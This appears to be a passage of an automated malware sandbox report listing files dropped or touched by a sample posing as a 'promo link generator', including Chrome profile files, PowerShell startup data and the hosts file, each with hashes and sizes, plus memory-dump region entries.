C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
7a872ee31cc01b2184286965e2daf3a2

SHA1
4f0b4676b6333a503178083f0ab8c1ed0e547cac

SHA256
209d7f2098512d8b543016bdc6862a4fa706cc250801e045febe124957ff08e4

SHA512
472c23292f8dc212de9b0e3aa1c8261f589b769e581bb3c5d50b087f8cc0761a17f4b8b22b427871b4cc227fe6dd823e5ae6b1b27249f357347ebda7d3faeb6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
061b39bb9a59d50aeb7ea5b4b49de244

SHA1
dbd24ac2dc205d5f104e8958b769ec77ff24678c

SHA256
625933fe10783e360b0606963bb450a0fae1b07abb5956161e285b59d48a5b70

SHA512
155f80f877f8e9c078187e97007b0829b6d25dab083f2463b721ca7679f53acf58bf25e573d37f23e6a76f5a9858f31164e1b8b8c6037b8efe77cbbea971f012

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
9a3090a2595095030e6d3a0ff57d47b3

SHA1
a9ee3808fa0575fec0867cbae3b76b3733d5956c

SHA256
bf8e9e6d564d4d34553770b673f0dba529497c40f7a4cb60f89a946a9d7e9dbb

SHA512
bf63b0ea75dabc1ec9192b26e4318160cb40a5455daaf0eac6c37f1fa0ab44aec32871f734c0807bdbfabd562aa81ceca5e95bf4cebce39431da000799037a89

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Filesize
8KB

MD5
94d22245e692542a6a8a4edbf13e3006

SHA1
be4ad01f1318cebbd1c66c98aacf2ea13b6684cb

SHA256
1da58c6db0f01a6a854610d15cb0765f7ec8c89ecb8a288a47461f6d383d2829

SHA512
d1ff64520d993a774c1c8cc949cd2c0397820db6a090b3087824ed365dd44cd40bf1b82de1f6412e7c004659bd18b679777353f1aae690224c7d88adf5298874

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
b0d3f71eb65caa3c65c4395b7edfb997

SHA1
85e791b38d99e5d970107867321e9a48a23a22e6

SHA256
4e5e49871205e71753a258f689b12a0859215da4b9c2a119e115167673e8b4c7

SHA512
0c51365c866ec488f82df35a9f047c22947255fc7aac6ad1851bf1c61c1fe35923f38ec11940b62adadb51c67045e36dda16e79f1943e978e56ad019c9d216c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
31c35c701d01829b0d1adf845441de98

SHA1
60d48dfa1b01707a35fc4ec7a63249a1b5e9b264

SHA256
ac3ce242e633f18fde35a4cec5681b2adcfe25c53e331389c634d7f466a0bde7

SHA512
bbe788f8dfdbc67e5b3392f18a900500186c228420bfe7d477166261f03f97ba35b264852ed25b063ea516ec345d167bfee4ef853d9b613b527ab375bda8460f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
de40c840976288b5426ca2742b398cd0

SHA1
f138268a3e09fd9e4579161c134ca84f7e0de9f1

SHA256
19023b3ac330ac0a565f21aaacd83529a9f472821aa88b2ed6010896a8916416

SHA512
29d4d4470695825d494f2ef3a75ffd9d8936af3a6492cde03de3d324c0664987be07434ba279e69ca015b582bcbe957b470724c056c52986bfcada362798ae1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f646443d765b11fee7d20e5503045a91

SHA1
8e264edf8a7ef8a7d7d483c38acaba8d5743c13e

SHA256
beb63c8900937eafaf909c1a060e9f152b9d6290fa3a416e6e6e7358140124c0

SHA512
61df6f8dae858fdbabbb227fad2424faf8cd16dd9d95f83170acf857772513057d6c9b654df398a2f2ca5139475c03f3999352c229b0aaf77d9fe74c427af64c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Promo link generator.exe.log

Filesize
1KB

MD5
547df619456b0e94d1b7663cf2f93ccb

SHA1
8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3

SHA256
8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a

SHA512
01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
a43e653ffb5ab07940f4bdd9cc8fade4

SHA1
af43d04e3427f111b22dc891c5c7ee8a10ac4123

SHA256
c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

SHA512
62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
072e03fe6fb3e4bd0d274894972b00f6

SHA1
ad945855cf14b19deec7320da0aa71408104c9ff

SHA256
bb76552ef43d7fab2e09b81f5abe9ef7ba2bd5d9fdce498a9c5dc094353d8bcd

SHA512
b0b3ee9cf383d202c2fda6643e3b2c3e83f13e1f892a748566b1bc8c95f0bf3c4dc557394ce9eb87ffee6905812313802bea29e15f1254f33672628d2aea6f98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5824a6037c081fda5d46de274b6e2799

SHA1
526367a09300cbde430e8fb44e41cbe7a0937aac

SHA256
4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

SHA512
a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7511c81925750deb7ad1b9b80eea8a8d

SHA1
6ea759b3cbd243ae11435c6d6c5ced185eb01f49

SHA256
5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa

SHA512
5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
f75bff85c7d144c6f55fe0cce837bfa7

SHA1
d7caba8d0abc1493e038d17844ef5e040652ad99

SHA256
308413343eac3a58bf495ab9ba2cc83e06ca65a8af61e36a47c2e6a0231ebe41

SHA512
a79ba68aba98673bdddedfafe14074945adf0590988d7a5cbcabd7e966a9ca15d360b1e3ae75e0b81c65510abe45507db5040dce84456957e75b863fc39598ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5ae6535f0a379e0d7d5abab83390d5c5

SHA1
f8231cd53b365100f267f7b4c17b985671057bad

SHA256
d600a6d0007c3a73f6ec4c7f9e211c2df282280eda8237bc1b2df118d15c6d6f

SHA512
eae4c5736c3e9beac89b8f580c227def39238e3b22f5cbd5b21ed5ea776396003326a2e48a237cb91a9a75f5e29646f875caa668e9b54da60bea150f83a96664

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
107102102e02e48f37f5318c7e113c43

SHA1
7fb10fc65c85fb4c050309f0872bc9389dcccc0d

SHA256
3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

SHA512
b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilrhp0ci.idc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Amruus promo link generator.rar

Filesize
79KB

MD5
0b25d0cf701d9c68ae40085c1afe2e3d

SHA1
0266c00fdcddc3e2f835cfb4109dffe1e7cf32c7

SHA256
8f0352553ab0acb32642074579db93344be53f54c700ee70bef3335db09c6529

SHA512
cb797620225ab96d36f58dd50570e00a71909ad68d5080ce5d85e0e0b8b85ea38aba4487b434973d8c28b61c5a3914f8e7779c488a67f4b3a9d80bd95fcf0b6a

Download Submit
C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe

Filesize
228KB

MD5
4e711e7231a67ebf4278a6ba9e2a1f98

SHA1
9bc200a14d089e0fe869674ee5f4219e86dc3009

SHA256
cfb4919168697ab5bfaa045cbf2c647aa55c1ffc8f5109acf90f2e90af14f40a

SHA512
38ac5f01c19304431f1b862172fd0ed7b67fd8926c94e289a7a9b06a6772b02c7708f9ebeb3263269721d379dede458bd29d16fd6eb81eb500d85b202707ec0f

Download Submit
C:\Users\Admin\Downloads\Amruus promo link generator\links.txt

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/640-108-0x000002C9C83F0000-0x000002C9C8430000-memory.dmp

Filesize
256KB

Download
memory/640-239-0x000002C9E2F20000-0x000002C9E30C9000-memory.dmp

Filesize
1.7MB

Download
memory/640-152-0x000002C9E2940000-0x000002C9E295E000-memory.dmp

Filesize
120KB

Download
memory/640-213-0x000002C9CA080000-0x000002C9CA08A000-memory.dmp

Filesize
40KB

Download
memory/640-214-0x000002C9E2920000-0x000002C9E2932000-memory.dmp

Filesize
72KB

Download
memory/640-110-0x000002C9E2980000-0x000002C9E2990000-memory.dmp

Filesize
64KB

Download
memory/640-109-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/640-150-0x000002C9E2890000-0x000002C9E28E0000-memory.dmp

Filesize
320KB

Download
memory/640-190-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/640-147-0x000002C9E2BD0000-0x000002C9E2C46000-memory.dmp

Filesize
472KB

Download
memory/640-196-0x000002C9E2980000-0x000002C9E2990000-memory.dmp

Filesize
64KB

Download
memory/640-210-0x000002C9E2980000-0x000002C9E2990000-memory.dmp

Filesize
64KB

Download
memory/640-240-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/2172-154-0x000001CAF03B0000-0x000001CAF03C0000-memory.dmp

Filesize
64KB

Download
memory/2172-192-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/2172-189-0x000001CAF04C0000-0x000001CAF060E000-memory.dmp

Filesize
1.3MB

Download
memory/2172-191-0x000001CAF03B0000-0x000001CAF03C0000-memory.dmp

Filesize
64KB

Download
memory/2172-155-0x000001CAF03B0000-0x000001CAF03C0000-memory.dmp

Filesize
64KB

Download
memory/2172-153-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/3272-143-0x000001C526C20000-0x000001C526D6E000-memory.dmp

Filesize
1.3MB

Download
memory/3272-130-0x000001C526B10000-0x000001C526B20000-memory.dmp

Filesize
64KB

Download
memory/3272-129-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/3272-140-0x000001C526B10000-0x000001C526B20000-memory.dmp

Filesize
64KB

Download
memory/3272-144-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/3568-232-0x0000017B40560000-0x0000017B406AE000-memory.dmp

Filesize
1.3MB

Download
memory/3568-233-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/3568-229-0x0000017B402D0000-0x0000017B402E0000-memory.dmp

Filesize
64KB

Download
memory/3568-224-0x0000017B402D0000-0x0000017B402E0000-memory.dmp

Filesize
64KB

Download
memory/3568-218-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/3584-123-0x0000021AD9380000-0x0000021AD9390000-memory.dmp

Filesize
64KB

Download
memory/3584-122-0x0000021AD9380000-0x0000021AD9390000-memory.dmp

Filesize
64KB

Download
memory/3584-126-0x0000021AD95F0000-0x0000021AD973E000-memory.dmp

Filesize
1.3MB

Download
memory/3584-127-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/3584-121-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/3584-120-0x0000021AD95C0000-0x0000021AD95E2000-memory.dmp

Filesize
136KB

Download
memory/4224-209-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/4224-193-0x00007FFA5BE40000-0x00007FFA5C901000-memory.dmp

Filesize
10.8MB

Download
memory/4224-195-0x0000029DAA1E0000-0x0000029DAA1F0000-memory.dmp

Filesize
64KB

Download
memory/4224-194-0x0000029DAA1E0000-0x0000029DAA1F0000-memory.dmp

Filesize
64KB

Download
memory/4224-208-0x0000029DAA3F0000-0x0000029DAA53E000-memory.dmp

Filesize
1.3MB

Download
memory/4284-317-0x000001069B5E0000-0x000001069B5F0000-memory.dmp

Filesize
64KB

Download
memory/4284-316-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/4284-340-0x000001069B5E0000-0x000001069B5F0000-memory.dmp

Filesize
64KB

Download
memory/4284-342-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5012-379-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5012-376-0x0000022C45C40000-0x0000022C45C50000-memory.dmp

Filesize
64KB

Download
memory/5012-375-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5012-377-0x0000022C45C40000-0x0000022C45C50000-memory.dmp

Filesize
64KB

Download
memory/5168-345-0x000001967C980000-0x000001967C990000-memory.dmp

Filesize
64KB

Download
memory/5168-344-0x000001967C980000-0x000001967C990000-memory.dmp

Filesize
64KB

Download
memory/5168-343-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5168-359-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5168-358-0x000001967C980000-0x000001967C990000-memory.dmp

Filesize
64KB

Download
memory/5416-273-0x00007FF67F720000-0x00007FF67F818000-memory.dmp

Filesize
992KB

Download
memory/5416-274-0x00007FFA5C5D0000-0x00007FFA5C604000-memory.dmp

Filesize
208KB

Download
memory/5416-275-0x00007FFA5BE40000-0x00007FFA5C0F4000-memory.dmp

Filesize
2.7MB

Download
memory/5416-276-0x000001C2B5120000-0x000001C2B61CB000-memory.dmp

Filesize
16.7MB

Download
memory/5416-277-0x00007FFA59950000-0x00007FFA59A62000-memory.dmp

Filesize
1.1MB

Download
memory/5624-282-0x000001F881960000-0x000001F881970000-memory.dmp

Filesize
64KB

Download
memory/5624-384-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5624-357-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5624-281-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5772-294-0x000002580EDE0000-0x000002580EDF0000-memory.dmp

Filesize
64KB

Download
memory/5772-292-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5772-293-0x000002580EDE0000-0x000002580EDF0000-memory.dmp

Filesize
64KB

Download
memory/5772-297-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5944-313-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5944-298-0x00007FFA5AC10000-0x00007FFA5B6D1000-memory.dmp

Filesize
10.8MB

Download
memory/5944-299-0x000001657B4D0000-0x000001657B4E0000-memory.dmp

Filesize
64KB

Download
memory/5944-300-0x000001657B4D0000-0x000001657B4E0000-memory.dmp

Filesize
64KB

Download
memory/5944-311-0x000001657B4D0000-0x000001657B4E0000-memory.dmp

Filesize
64KB

Download